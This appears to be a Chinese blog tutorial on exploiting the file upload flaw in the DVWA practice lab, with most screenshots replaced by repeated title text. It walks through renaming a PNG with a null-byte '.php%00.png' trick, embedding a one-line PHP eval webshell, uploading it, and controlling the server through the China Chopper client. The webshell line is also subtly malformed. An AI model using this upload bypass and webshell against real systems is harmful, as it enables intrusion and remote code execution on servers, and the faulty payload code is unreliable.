黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

游戏|数码彩彩2024-04-29 7:41:12397A+A-

在kali的里面随机找一张png结尾的图片,然后重命名一下改成1.php%00.png。

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

改成这样的名字!!

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

然后用编辑器编辑一下!

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

在空白处写入一句话木马!!<%php @eval($_POST[pass]);?>

像这样:

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

然后保存!

 

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

 

打开burpsuit抓个包看看!!

 

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

 

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

 

可惜了,我们用了%00截断不需要改包!

 

这样就上传成功!!!

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

 

在菜刀地址上填上上路径!!再填上上密码!!!

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

 

就可以看见我的服务器里面的目录了,因为我的centos 7 所以罗!

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

 

然后我们进入我的服务器端看看!!

黑客入门利器,dvwa文件上传漏洞,带你进入黑客大门

 

画红线的就是我们上传的木马!!!

点击这里复制本文地址 版权声明:本文内容由网友提供,该文观点仅代表作者本人。本站(https://www.angyang.net.cn)仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件举报,一经查实,本站将立刻删除。

昂扬百科 © All Rights Reserved.  渝ICP备2023000803号-3网赚杂谈